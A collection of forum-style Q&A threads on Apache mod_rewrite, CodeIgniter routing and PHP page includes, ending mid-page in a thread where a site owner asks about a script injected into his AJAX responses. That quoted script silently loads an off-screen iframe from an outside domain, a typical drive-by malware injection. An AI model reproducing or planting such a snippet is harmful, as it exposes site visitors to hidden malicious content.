mod_rewrite to give PHP get parameters doesn't work - php

Why is this mod_rewrite not working?
RewriteEngine On
RewriteRule ^([a-zA-Z0-9/_-]+)(|)$ /index.php?url=$1 [L]
RewriteRule ^news/(.*)$ index.php?url=news&id=$1 [NC]
Here's the PHP code for handling the loading of the news:
<?php
$sql = DB::Query("SELECT id,title,longstory FROM news WHERE id = ".filter($_GET['id'])."");
if(DB::NumRows($sql) == 1)
{
while($news = $sql->fetch_assoc())
{
echo '
<div class="box">
<div class="title">
'.$news["title"].'
</div>
<div class="mainBox newsBox" style="float;left">
<div class="boxHeader"></div>
'.html_entity_decode($news['longstory']).'
</div>
</div>';
}
} else
{
?>
<div class='box'>
<div class='title red'>Artikel is niet gevonden.</div>
<div class='mainBox'>
Jammer genoeg is dit nieuws artikel niet gevonden!
</div>
</div>
<?php
}
?>
If I use http://127.0.0.1/index.php?url=news&id=48 it's working, but http://127.0.0.1/news/48 doesn't, even though I have added the mod_rewrite rule in my .htaccess.

Your first rule matches the /news/48 pattern as well. Change the order of the rules and put the specific one, ^news/(.*)$, first.

Related

Getting a 500 Internal Server Error when rewriting 2 specific URLs

I keep getting a 500 internal server error when trying to rewrite these two specific URLs/files (item.php & purchase.php); the rest works.
I have tried many ways to fix this but nothing seemed to work, which is weird because all other URLs do work, but these 2 just seem to not want to work for some reason.
.htaccess file
Options -Indexes
RewriteEngine on
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME}\.php -f
RewriteRule ^(.*)$ $1.php
ErrorDocument 500 "500"
ErrorDocument 404 "404"
ErrorDocument 403 "403"
RewriteRule ^users/([^/]*)$ /user/profile.php?username=$1
RewriteRule ^users/([^/]*)/inventory$ /user/GetUserInventory.php?username=$1
RewriteRule ^market/item/([^/]*)$ /market/item.php?id=$1
RewriteRule ^market/item/([^/]*)/purchase$ /market/purchase.php?id=$1
RewriteRule ^community/([^/]*)$ /communities/view.php?id=$1
RewriteRule ^community/([^/]*)/join$ /communities/join.php?id=$1
RewriteRule ^community/([^/]*)/manage$ /communities/manage.php?id=$1
RewriteRule ^game/([^/]*)$ /games/view.php?id=$1
item.php
<?php
include_once('../private/header.php');
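// Bind the id as a parameter instead of concatenating $_GET['id'] into the SQL string.
$item = $handler->prepare("SELECT * FROM items WHERE id = ?");
$item->execute([$_GET['id']]);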
$gB = $item->fetch(PDO::FETCH_OBJ);
echo '
<div class="col s12 m9 l8">
<div class="container" style="width:100%;">
<div class="content-box" style="border-radius:0;">
<div class="left-align">
</div>
<div class="row">
<div class="col s12 m6 l3 center-align">
<img src="'.$cdnServer.'/items/thumbnails/'.$gB->image.'.png" class="responsive-img">
</div>
<div class="col s12 m6 l6">
<div style="padding-left:25px;overflow:hidden;">
<div style="font-size:26px;font-weight:300;">'.$gB->name.'
<b style="text-transform:uppercase;font-size:12px;">'.$gB->type.'</b>
</div>
<div style="color:#777;font-size:14px;">'.$gB->description.'</div>
</div>
</div>
<div class="col s12 m3 l3 center-align" style="padding-top:15px;">
<center>
';
if ($gB->onsale == 1){
echo 'Purchase';
} else {
echo '<a class="modal-trigger waves-effect waves-light btn grey darken-2">Offsale</a>';
}
echo '
</center>
<div style="height:15px;"></div>
<center><b style="text-transform:uppercase">Creator</b></center>
<center>'.$gB->creator.'</center>
';
if($gB->collectable == 'true'){
if($gB->amount == 0)
echo '
<center><span style="color:red">Sold Out</span></center>
';
}else{
echo '
<center><span style="color:red">'.$gB->amount.' Remaining</span></center>
';
}
echo '
<div style="height:25px;"></div>
</div>
</div>
<div style="padding-top:25px;">
<div class="row" style="margin-bottom:0;">
<div class="col s12 m12 l3 center-align">
<div style="font-size:20px;">'.$gB->created.'</div>
<div style="color:#999;font-size:14px;">Time Created</div>
</div>
<div class="col s12 m12 l3 center-align">
<div style="font-size:20px;">'.$gB->created.'</div>
<div style="color:#999;font-size:14px;">Last Updated</div>
</div>
<div class="col s12 m12 l3 center-align">
<div style="font-size:20px;">???</div>
<div style="color:#999;font-size:14px;">Owners</div>
</div>
</div>
</div>
</div>
';
include_once('../private/footer.php');
purchase.php
<?php
include_once('../private/config.php');
if ($user){
$money=$myu->CurrencyCoins;
$id=$_GET['id'];
// Bind request data as parameters instead of concatenating it into the SQL strings.
$item = $handler->prepare("SELECT * FROM items WHERE id = ?");
$item->execute([$id]);
$gB = $item->fetch(PDO::FETCH_OBJ);
$amount=$gB->amount;
if ($gB->onsale == 1){
if ($money >= $gB->price){
if ($gB->collectable != "true"){
if ($amount != 0){
$new = ($money - $gB->price);
$handler->prepare("UPDATE `users` SET `CurrencyCoins` = ? WHERE `id` = ?")->execute([$new, $myu->id]);
$handler->prepare("INSERT INTO inventory (item,user) VALUES (?, ?)")->execute([$id, $myu->id]);
}
} else {
if ($amount >= 1){
$amount1=($amount - 1);
$new = ($money - $gB->price);
$handler->prepare("UPDATE `users` SET `CurrencyCoins` = ? WHERE `id` = ?")->execute([$new, $myu->id]);
$handler->prepare("UPDATE `items` SET `amount` = ? WHERE `id` = ?")->execute([$amount1, $gB->id]);
$handler->prepare("INSERT INTO inventory (item,user) VALUES (?, ?)")->execute([$id, $myu->id]);
} else {
echo '<center><h2>Item is sold out!</h2></center>';
}
}
}
} else {
echo '<center><h2>Item not on sale!</h2></center>';
}
}
echo '<head><meta http-equiv="refresh" content="1; url='.$serverUrl.'/account/character"></head>';
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME}\.php -f
RewriteRule ^(.*)$ $1.php
These directives should be at the end of your .htaccess file, after the other rewrites. They are also incorrect: placing them at the end of the file will avoid the immediate issue, but they could still cause problems with other URLs.
In its current state, when you request example.com/market/item/1 (where it would seem, /market is a physical directory, and /item.php is a file in that directory) then...
In brief... it results in an endless rewrite loop:
/market/item/1.php
/market/item/1.php.php
/market/item/1.php.php.php
/market/item/1.php.php.php.php
etc.
Which breaks (after 10 iterations) with a 500 response being sent to the browser.
A very similar process happens when requesting /market/item/1/purchase:
/market/item/1/purchase.php
/market/item/1/purchase.php.php
/market/item/1/purchase.php.php.php
/market/item/1/purchase.php.php.php.php
etc.
In detail...
1. REQUEST_FILENAME is /market/item (ignoring the directory-prefix) and PATH_INFO is /1 (important for later). /market/item is not a directory (1st condition), but /market/item.php is a file (2nd condition) - so both conditions are successfully met.
2. The RewriteRule directive then rewrites /market/item/1 to /market/item/1.php (clearly incorrect and not the intention). Since there is no L flag on this rule, processing continues... for the sake of the remaining rules, the PATH_INFO (from the initial request, /1) is appended to the resulting URL to become /market/item/1.php/1 (the DPI flag - discard path info - was created to prevent this specific behaviour).
3. /market/item/1.php/1 does not match any further rules in the current pass, so the rewrite engine starts over at the top with /market/item/1.php.
4. REQUEST_FILENAME is again /market/item and PATH_INFO is now /1.php. /market/item is not a directory (1st condition), but /market/item.php is a file (2nd condition) - so both conditions are successfully met a second time.
5. The RewriteRule directive then rewrites /market/item/1.php to /market/item/1.php.php. Since there is no L flag on this rule, processing continues... for the sake of the remaining rules, the PATH_INFO (from the request, /1.php this time) is appended to the resulting URL to become /market/item/1.php.php/1.php.
6. /market/item/1.php.php/1.php does not match any further rules in the current pass, so the rewrite engine starts over at the top with /market/item/1.php.php.
7. GOTO #4 (with updated URL-path) etc. etc. etc. rewrite loop, 500 error.
And a very similar process happens when requesting /market/item/1/purchase. The REQUEST_FILENAME is the same /market/item (so it again checks that /market/item.php exists, not purchase.php), except that the PATH_INFO is /1/purchase (not /1). And the initial URL-path that the .php extension is appended to is naturally /market/item/1/purchase (not /market/item/1).
Fix
If you've followed that "confusing muddle", you'll see that the condition that checks for the existence of the "path/to/file" + ".php" is not necessarily the same as the rule that actually rewrites the request to "URL-path" + ".php". ("path/to/file" is not the same as the "URL-path"). To fix this, it should be written as:
RewriteCond %{DOCUMENT_ROOT}/$1.php -f
RewriteRule (.*) $1.php [L]
No real need for the directory check here, since if it was a directory, the file check that follows must fail (unless you have directory names that end in .php). The %{DOCUMENT_ROOT}/$1.php check is now effectively "the same" as $1.php (the file being rewritten to).
The literal dot does not need to be backslash escaped in the RewriteCond TestString - this is an "ordinary" string, not a regex.
Don't forget the L flag(s). And this rule block should now go at the end of the .htaccess file.
Summary
Options -Indexes
RewriteEngine on
ErrorDocument 500 "500"
ErrorDocument 404 "404"
ErrorDocument 403 "403"
RewriteRule ^users/([^/]*)$ /user/profile.php?username=$1 [L]
RewriteRule ^users/([^/]*)/inventory$ /user/GetUserInventory.php?username=$1 [L]
RewriteRule ^market/item/([^/]*)$ /market/item.php?id=$1 [L]
RewriteRule ^market/item/([^/]*)/purchase$ /market/purchase.php?id=$1 [L]
RewriteRule ^community/([^/]*)$ /communities/view.php?id=$1 [L]
RewriteRule ^community/([^/]*)/join$ /communities/join.php?id=$1 [L]
RewriteRule ^community/([^/]*)/manage$ /communities/manage.php?id=$1 [L]
RewriteRule ^game/([^/]*)$ /games/view.php?id=$1 [L]
# Append .php on remaining requests
RewriteCond %{DOCUMENT_ROOT}/$1.php -f
RewriteRule (.*) $1.php [L]
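The two rule-ordering problems on this page, the catch-all rule shadowing ^news/(.*)$ in the first question and the extension-appending loop walked through in the answer above, replayed in a small Python model of per-directory rewriting. This is an added example, not code from either thread: rewrite, split_path and the condition helpers are hypothetical names, and the model covers only what the answers describe (ordered rules, the L flag, PATH_INFO re-appended after a rule without L, a 10-pass limit).

```python
import re

MAX_PASSES = 10  # the answer's "after 10 iterations" limit


def split_path(path, dirs):
    """Return (REQUEST_FILENAME, PATH_INFO), both relative to the document root.

    The walk stops at the first segment that is not an existing directory;
    everything after that segment is PATH_INFO.
    """
    segments, current = path.strip("/").split("/"), ""
    for i, segment in enumerate(segments):
        current += "/" + segment
        if current not in dirs:
            rest = "/".join(segments[i + 1:])
            return current, ("/" + rest if rest else "")
    return current, ""


def rewrite(url_path, rules, files, dirs):
    """Run a .htaccess rule list until a pass changes nothing or the limit is hit.

    Each rule is (pattern, substitution, flags, condition-or-None).
    Returns (status, path, query, passes) with status "ok" or "500".
    """
    path, query = url_path.lstrip("/"), ""
    for passes in range(1, MAX_PASSES + 1):
        filename, path_info = split_path(path, dirs)
        subject, changed = path, False
        for pattern, target, flags, cond in rules:
            m = re.match(pattern, subject, re.I if "NC" in flags else 0)
            if not m or (cond and not cond(m, filename, files, dirs)):
                continue
            out = re.sub(r"\$(\d)", lambda ref: m.group(int(ref.group(1))), target)
            path, _, new_query = out.lstrip("/").partition("?")
            query = new_query or query
            changed = True
            if "L" in flags:
                break
            # Without L, later rules in this pass see the rewritten path with
            # the original PATH_INFO appended (the case the DPI flag addresses).
            subject = path + path_info
        if not changed:
            return "ok", "/" + path, query, passes
    return "500", "/" + path, query, MAX_PASSES


def php_next_to_filename(m, filename, files, dirs):
    # Question's conditions: REQUEST_FILENAME is not a directory and
    # REQUEST_FILENAME + ".php" is a file.
    return filename not in dirs and filename + ".php" in files


def php_at_target(m, filename, files, dirs):
    # Answer's condition: DOCUMENT_ROOT/$1.php is a file, i.e. the same
    # file the rule is about to rewrite to.
    return "/" + m.group(1) + ".php" in files


ITEM = (r"^market/item/([^/]*)$", "/market/item.php?id=$1")
PURCHASE = (r"^market/item/([^/]*)/purchase$", "/market/purchase.php?id=$1")

# Second question: the extension rule comes first and no rule carries L.
QUESTION_RULES = [
    (r"^(.*)$", "$1.php", set(), php_next_to_filename),
    ITEM + (set(), None),
    PURCHASE + (set(), None),
]
# The answer's summary: specific rules first, every rule flagged L.
ANSWER_RULES = [
    ITEM + ({"L"}, None),
    PURCHASE + ({"L"}, None),
    (r"(.*)", "$1.php", {"L"}, php_at_target),
]
# First question: the catch-all precedes ^news/(.*)$ and stops processing with L.
NEWS_ORIGINAL = [
    (r"^([a-zA-Z0-9/_-]+)(|)$", "/index.php?url=$1", {"L"}, None),
    (r"^news/(.*)$", "index.php?url=news&id=$1", {"NC"}, None),
]
NEWS_REORDERED = NEWS_ORIGINAL[::-1]

# Document-root layouts the answers assume: /market is a directory holding
# item.php and purchase.php; the first site has only /index.php.
MARKET_FILES, MARKET_DIRS = {"/market/item.php", "/market/purchase.php"}, {"/market"}
NEWS_FILES, NEWS_DIRS = {"/index.php"}, set()

if __name__ == "__main__":
    for name, rules in (("question", QUESTION_RULES), ("answer", ANSWER_RULES)):
        for url in ("/market/item/1", "/market/item/1/purchase"):
            print(name, url, rewrite(url, rules, MARKET_FILES, MARKET_DIRS))
    for name, rules in (("original", NEWS_ORIGINAL), ("reordered", NEWS_REORDERED)):
        print(name, "/news/48", rewrite("/news/48", rules, NEWS_FILES, NEWS_DIRS))
```

With the question's rule order both market URLs end in status 500 with ten .php suffixes; with the answer's order they settle on item.php and purchase.php with id=1 after two passes.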

Object Not found in xampp server in code igniter?

I am new to CodeIgniter and I am developing a simple login system, for which I am using XAMPP. I uploaded CodeIgniter to the folder code/, and the following is the MVC code.
Controller login.php
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
class Login extends CI_Controller
{
public function __construct()
{
parent::__construct();
$this->load->library('session');
$this->load->helper('form');
$this->load->helper('url');
$this->load->helper('html');
$this->load->database();
$this->load->library('form_validation');
//load the login model
$this->load->model('login_model');
}
public function index()
{
//get the posted values
$username = $this->input->post("txt_username");
$password = $this->input->post("txt_password");
//set validations
$this->form_validation->set_rules("txt_username", "Username", "trim|required");
$this->form_validation->set_rules("txt_password", "Password", "trim|required");
if ($this->form_validation->run() == FALSE)
{
//validation fails
$this->load->view('login_view');
}
else
{
//validation succeeds
if ($this->input->post('btn_login') == "Login")
{
//check if username and password is correct
$usr_result = $this->login_model->get_user($username, $password);
if ($usr_result > 0) //active user record is present
{
//set the session variables
$sessiondata = array(
'username' => $username,
'loginuser' => TRUE
);
$this->session->set_userdata($sessiondata);
redirect("index");
}
else
{
$this->session->set_flashdata('msg', '<div class="alert alert-danger text-center">Invalid username and password!</div>');
redirect('login/index');
}
}
else
{
redirect('login/index');
}
}
}
}?>
Model is login_model.php
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
class login_model extends CI_Model
{
function __construct()
{
// Call the Model constructor
parent::__construct();
}
//get the username & password from tbl_usrs
function get_user($usr, $pwd)
{
// Bind the values with CodeIgniter query bindings instead of concatenating them into the SQL.
$sql = "select * from tbl_usrs where username = ? and password = ? and status = 'active'";
$query = $this->db->query($sql, array($usr, md5($pwd)));
return $query->num_rows();
}
}?>
And View is login_view
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Login Form</title>
<!--link the bootstrap css file-->
<link href="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/css/bootstrap.min.css" rel="stylesheet">
<style type="text/css">
.colbox {
margin-left: 0px;
margin-right: 0px;
}
</style>
</head>
<body>
<div class="container">
<div class="row">
<div class="col-lg-6 col-sm-6">
<h1>COLORS</h1>
</div>
<div class="col-lg-6 col-sm-6">
<ul class="nav nav-pills pull-right" style="margin-top:20px">
<li class="active">Login</li>
<li>Signup</li>
</ul>
</div>
</div>
</div>
<hr/>
<div class="container">
<div class="row">
<div class="col-lg-4 col-sm-4 well">
<?php
$attributes = array("class" => "form-horizontal", "id" => "loginform", "name" => "loginform");
echo form_open("login/index", $attributes);?>
<fieldset>
<legend>Login</legend>
<div class="form-group">
<div class="row colbox">
<div class="col-lg-4 col-sm-4">
<label for="txt_username" class="control-label">Username</label>
</div>
<div class="col-lg-8 col-sm-8">
<input class="form-control" id="txt_username" name="txt_username" placeholder="Username" type="text" value="<?php echo set_value('txt_username'); ?>" />
<span class="text-danger"><?php echo form_error('txt_username'); ?></span>
</div>
</div>
</div>
<div class="form-group">
<div class="row colbox">
<div class="col-lg-4 col-sm-4">
<label for="txt_password" class="control-label">Password</label>
</div>
<div class="col-lg-8 col-sm-8">
<input class="form-control" id="txt_password" name="txt_password" placeholder="Password" type="password" value="<?php echo set_value('txt_password'); ?>" />
<span class="text-danger"><?php echo form_error('txt_password'); ?></span>
</div>
</div>
</div>
<div class="form-group">
<div class="col-lg-12 col-sm-12 text-center">
<input id="btn_login" name="btn_login" type="submit" class="btn btn-default" value="Login" />
<input id="btn_cancel" name="btn_cancel" type="reset" class="btn btn-default" value="Cancel" />
</div>
</div>
</fieldset>
<?php echo form_close(); ?>
<?php echo $this->session->flashdata('msg'); ?>
</div>
</div>
</div>
<!--load jQuery library-->
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.11.1/jquery.min.js"></script>
<!--load bootstrap.js-->
<script src="//maxcdn.bootstrapcdn.com/bootstrap/3.2.0/js/bootstrap.min.js"></script>
</body>
</html>
In config I used
$config['index_page'] = '';
and in routes I used
$route['default_controller'] = 'login';
$route['404_override'] = '';
$route['translate_uri_dashes'] = FALSE;
While accessing localhost/code/ it works fine, but when I click the login button it goes to the URL http://localhost/code/localhost/login/index and shows an "Object not found" 404 error.
Open application/config/config.php and set your base_url(). E.g: $config['base_url'] = 'http://localhost/code/';
Create .htaccess file under /code folder (Where application and system folder is) like below:
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php/$1 [L]
Create a .htaccess file in \code\ as:
RewriteEngine On
RewriteBase /code/
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php/$1 [L]
and in config/config.php
$config['base_url'] = 'http://localhost/code';
Hope it will help you.
I got the same error as shown below. I am using PHP/CodeIgniter. I have defined $config['base_url'] = 'http://localhost/******'; in my config file. Still it was showing the same issue.
Object not found! The requested URL was not found on this server. If
you entered the URL manually please check your spelling and try again.
If you think this is a server error, please contact the webmaster.
How I solved this:
Step 1: First I checked the httpd.conf file. mod_rewrite was imported there.
Step 2: Checked whether the file is located at the actual location or not.
Step 3: Checked for spelling mistakes in the redirection or anchor tag.
Step 4: Checked the $config['base_url'] variable in the application/config.php file.
Step 5: Checked the $config['index_page'] variable in the application/config.php file. Here was my actual problem. I had set it to blank and there was something wrong with my mod_rewrite module. When I put $config['index_page']='index.php' it started working for me.

how to load different page in a index page of website

I'm trying to build a website that has different pages.
I'm a newbie to PHP. I have an index page with certain tables for holding the header, navigation menu, main body, a sidebar and a footer. The index page is attached to all the above-mentioned elements using include("filename.extension");. The problem is that I tried to load the main body, i.e. the content of the site, dynamically when the menu is changed.
Below is my code; any suggestion on this is much appreciated. Thanks in advance.
<body>
<div> <?php Include('header.php'); </div>
<div id="menu" align="center">
<table width="790" height="35">
<tr>
<td>Home</td>
<td>Register</td> // this page need to display on the same window with other elements, after click.
</tr>
</tabel>
</div>
<div id="sidebar" align="right"> <?php include ("sidebar.php");?> </div>
<div id="Content ">
<?php include("FILE"); // here i need to display the hyper linked page.?>
</div>
<div id="footer"> <?php include("footer.php");?> </div>
</body>
Guess Diogo's answer will get you to what you want. Create your index.php file like this.
//menu area
<div id="menuWrap">
link to page1
link to page2
</div>
//side bar
<div id="sidebarWrap">...</div>
//content area
<div id="contentWrap">
<?php
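switch(isset($_GET['page']) ? $_GET['page'] : '') // missing parameter falls through to default
{
case 'page1':
include __DIR__ . '/pages/page1.php'; // resolved relative to index.php, not the filesystem root
break;
case 'page2':
include __DIR__ . '/pages/page2.php';
break;
default:
include __DIR__ . '/pages/notfound.php';
}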
?>
</div>
//footer
<div id="footerWrap">...</div>
This way you can display other pages of your site in the same window; only the content area will change.
Update:
I have corrected your typos; here is the answer according to your code segment.
<body>
<div>
<?php Include('header.php'); ?>
</div>
<div id="menu" align="center">
<table width="790" height="35">
<tr>
<td>Home</td>
<td>Register</td>
</tr>
</table>
</div>
<div id="sidebar" align="right">
<?php include ("sidebar.php"); ?>
</div>
<div id="Content ">
<?php
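switch(isset($_GET['page']) ? $_GET['page'] : '') // missing parameter falls through to default
{
case 'page1':
include __DIR__ . '/pages/home.php';//file path of your home page, resolved relative to index.php
break;
case 'page2':
include __DIR__ . '/pages/students/reg.php';
break;
default:
include __DIR__ . '/pages/notfound.php';
}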
?>
</div>
<div id="footer">
<?php include("footer.php");?>
</div>
</body>
First, create a file with exactly the name below: (including the dot)
.htaccess
and put it in the same folder of your index.
Inside the .htaccess, write the following code:
# .htaccess mod_rewrite
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME} !-l
RewriteRule ^(.*)$ index.php?page=$1 [QSA,L]
In this case the .htaccess rewrites the URLs so that http://127.0.0.1/index.php?page=register also accepts the "blogging pretty URL" http://127.0.0.1/register
Inside your index.php folder, create a new folder "pages".
Inside of the folder pages, create 4 simple PHP files (home.php, register.php, anyother.php and notfound.php), with any content like
<?php
echo "I'm the Register Page.";
?>
This will be an example of index based on your code.
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head><meta http-equiv="content-type" content="text/html; charset=utf-8"><title>title</title></head>
<body>
<div>
<?php include 'header.php'; ?>
</div>
<div id="menu" align="center">
<table width="790" height="35">
<tr>
<td>Home</td>
<td>Register</td>
<td>AnyOther</td>
<td>Broken Sample</td>
</tr>
</table>
</div>
<div id="sidebar" align="right">
<?php include 'sidebar.php'; ?>
</div>
<div id="Content ">
<?php
if(!isset($_GET['page']) || $_GET['page'] == ''){
$page = 'home'; //If no page specified
} else {
$page = $_GET['page'];
}
switch($page)
{
case 'home':
include __DIR__ . '/pages/home.php';//file path of your home page, resolved relative to index.php
break;
case 'register':
include __DIR__ . '/pages/register.php';
break;
case 'anyother':
include __DIR__ . '/pages/anyother.php';
break;
default:
include __DIR__ . '/pages/notfound.php'; //Any page that doesn't exist shows the not-found page.
}
?>
</div>
<div id="footer">
<?php include("footer.php");?>
</div>
</body>
</html>

codeigniter form not working

I am trying to create a search form in my CodeIgniter site header; however, every time the form is submitted, I receive a 404 error saying the page cannot be found! I have attempted to create a link to a test page and this gave me the same error.
Please observe my code below.
view(site_header)
<?php echo doctype(); ?>
<html lang="en">
<link href="<?php echo base_url(); ?>styles/style.css" type="text/css" rel="stylesheet"/>
<head>
<title></title>
<div id="container">
<div id="search">
<?php
echo form_open('search_keyword');
echo form_label("Stumble a search ", "searchfor");
echo form_input("search","search");
echo form_submit("getSearch","Search");
echo form_close(); ?>
</div>
</div>
</head>
</html>
model (model_search)
<?php
class Model_search extends CI_Model {
public function get_results($search_term){
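// Bind the search term with CodeIgniter query bindings instead of interpolating it; the nested single quotes in the original string were also a syntax error.
$query = $this->db->query("SELECT embed, title FROM videos WHERE tags LIKE ? ORDER BY RAND() LIMIT 1", array('%' . $search_term . '%'));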
return $query->result();
}
}
?>
Controller (site.php) default controller
<?php
if ( ! defined('BASEPATH')) exit('No direct script access allowed');
class Site extends CI_Controller {
public function index(){
$this->home();
}
public function home(){
$this->load->model("model_get");
$data["results"] = $this->model_get->getRand();
$this->load->view("site_header");
$this->load->view("site_content", $data);
$this->load->view("site_footer");
}
public function search_keyword()
{
$this->load->model('model_search');
$search_term = $this->input->post('search');
$data['results'] = $this->model_search->get_results($search_term);
$this->load->view('site_header');
$this->load->view('search_content',$data);
$this->load->view('site_footer');
}
}
?>
Results page (search_content)
<body>
<link href="<?php echo base_url(); ?>styles/style.css" type="text/css" rel="stylesheet"/>
<div id="container">
<div id="intro">
<?php echo heading("Search Results",1);?>
</div>
<div id ="content">
<p>Stumble videos related to <?php echo $search_term; ?> </p>
<?php
foreach ($results as $row) {
$title = $row->title;
$vid = $row->embed;
}
echo heading($title, 3);
echo $vid;
?>
</div>
</div>
</body>
Perhaps I am missing something obvious; however, I think it may be to do with my .htaccess file, which is posted below.
(.htaccess)
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /code/
RewriteCond %{REQUEST_URI} ^system.*
RewriteRule ^(.*)$ /index.php?/$1 [L]
RewriteCond %{REQUEST_URI} ^application.*
RewriteRule ^(.*)$ /index.php?/$1 [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ index.php?/$1 [L]
</IfModule>
CodeIgniter URLs need both the controller name and the method.
form_open('site/search_keyword')
Maybe a stupid question, but did you remove the "index.php" from the $config['index_page'] variable in your config.php ?
And if you don't use any route to link 'search_keyword' to 'site/search_keyword', be sure to use the form_open('site/search_keyword') as specified previously.
Btw, here's the .htaccess I always use on my Codeigniter projects to rewrite the urls. Just add your RewriteBase on this to make it work.
DirectoryIndex index.php
RewriteEngine on
RewriteCond $1 !^(index\.php|img|assets|css|js|robots\.txt|favicon\.ico)
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ ./index.php/$1 [L,QSA]

Very Confusing Return Data with AJAX Call [closed]

Whenever a link is clicked on the site at http://www.btandthetenants.com, I have an AJAX request to make the content load automatically. However, recently, I have been seeing this confusing bit of code injected into my return data:
<script>
var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php');
_q.style.position = 'absolute';
_q.style.width = '12px';
_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1);
_q.style.left = '-4327px';
document.write('<div id=\'pzeadv\'></div>');
document.getElementById('pzeadv').appendChild(_q);
</script>
This is my current code for clicking:
$("#nav a").click(function(event) {
var sHREF = $(this).attr("href");
var sPage = sHREF.replace(oVars.sPrefix(), "");
if (oVars.sCurrent != sPage) {
// As long as we're not currently on the page we just clicked on...
//oVars.sCurrent = sPage;
if (oVars.oArchive.isOpen()) oVars.oArchive.toggle();
loadContent(sHREF, true, false);
track(sPage);
}
event.preventDefault();
});
... and the loadContent function:
function loadContent(sURL, bPush, bReplace) {
var $Box = $("#loaded .box-1"),
$Content = $Box.find(".inner");
$("#nav a").removeClass("active");
$("#nav a[href='"+ sURL +"']").addClass("active");
oVars.sCurrent = sURL.split("&")[0];
// Closes any picture open in Colorbox.
if ( oVars.sCurrent != "pictures" && oVars.bI && $("#colorbox").css("display") != "none" )
$.colorbox.close();
if (!oVars.bIE) {
if (bPush) {
var objState = { page: oVars.sCurrent };
if (bReplace)
history.replaceState(objState, "", "");
else
history.pushState(objState, "", sURL);
} else {}
}
if (!bReplace) {
// Load the page.
$Box.slideUp(oVars.iSpeed / 2, "", function() {
$.get(
"index.php" + oVars.sPrefix() + sURL,
oVars.oNHF,
function(sData) {
var $El = $(sData).filter(":first"), // This is the element that would be displayed
$Script = $(sData).filter(":last"),
sPage = extractPage("ending").toLowerCase();
console.debug(sData);
// Change documentElement to body and circumvent the issues caused by the iPhone version... yadda yadda.
document.documentElement.className = sPage;
// Try and make it a regular expression to replace the words after the separator.
document.title = oPHP.const.NAME + oPHP.const.TEXT_DIVIDER + ( (sPage == "home") ? "Home" : oPHP.vars.titles[sPage].replace(/\<.*\>/, "").trim() );//ucwords(sPage);
$Box.html(sData).slideDown(oVars.iSpeed / 2);
// Reload the Facebook widgets for the current page.
reloadWidgets();
}
);
} );
}
}
sData in loadContent is returning that mysterious <script> tag at the beginning like this:
<script>
// THIS IS THE EVIL SNIPPET THAT'S BEING INSERTED INTO MY CODE.
var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'http://cabaniaseleden.com.ar/stats.php');
_q.style.position = 'absolute';
_q.style.width = '12px';
_q[_n]('frameborder', navigator.userAgent.indexOf('39c33260f6d7671e2dae7f08d1087e22') + 1);
_q.style.left = '-4327px';
document.write('<div id=\'pzeadv\'></div>');
document.getElementById('pzeadv').appendChild(_q);
</script>
<div class="box-1" id="pictures">
<div class="title">
Pictures <span class="links"><a class="fblink" href="http://www.facebook.com/elemovements?sk=photos" target="_blank" title="Visit this Page on Facebook">View on Facebook</a></span>
</div>
<div class="body">
<div class="inner transition">
<div>
<div class="section-title">
Albums
</div>
<span class="gray italic size">(4 albums, 13 pictures)</span>
</div>
<div class="album-container">
<a fb-href="http://www.facebook.com/album.php?fbid=332120860192434&id=156848747719647&aid=77394" href="pictures&action=list_pics&aid=156848747719647_77394&size=1&name=Wall Photos" title="">
<div class="album">
<img src="http://photos-a.ak.fbcdn.net/hphotos-ak-ash3/527637_332120863525767_1834367592_s.jpg">
</div>
</a>
<div class="name">
<a fb-href="http://www.facebook.com/album.php?fbid=332120860192434&id=156848747719647&aid=77394" href="pictures&action=list_pics&aid=156848747719647_77394&size=1&name=Wall Photos" title="">Wall Photos</a>
</div>
</div>
<div class="album-container">
<a fb-href="http://www.facebook.com/album.php?fbid=171845276219994&id=156848747719647&aid=44093" href="pictures&action=list_pics&aid=156848747719647_44093&size=2&name=Posters" title="">
<div class="album">
<img src="http://photos-b.ak.fbcdn.net/hphotos-ak-ash4/427627_278221322249055_1137145612_s.jpg">
</div>
</a>
<div class="name">
<a fb-href="http://www.facebook.com/album.php?fbid=171845276219994&id=156848747719647&aid=44093" href="pictures&action=list_pics&aid=156848747719647_44093&size=2&name=Posters" title="">Posters</a>
</div>
</div>
<div class="album-container">
<a fb-href="http://www.facebook.com/album.php?fbid=261713630566491&id=156848747719647&aid=63000" href="pictures&action=list_pics&aid=156848747719647_63000&size=4&name=Newby's Show" title="The guys' show on 1/29/2012 at Newby's. Taken in Memphis, TN.">
<div class="album">
<img src="http://photos-f.ak.fbcdn.net/hphotos-ak-ash4/407659_261713673899820_1183906213_s.jpg">
</div>
</a>
<div class="name">
<a fb-href="http://www.facebook.com/album.php?fbid=261713630566491&id=156848747719647&aid=63000" href="pictures&action=list_pics&aid=156848747719647_63000&size=4&name=Newby's Show" title="The guys' show on 1/29/2012 at Newby's. Taken in Memphis, TN.">Newby's Show</a>
</div>
</div>
<div class="album-container">
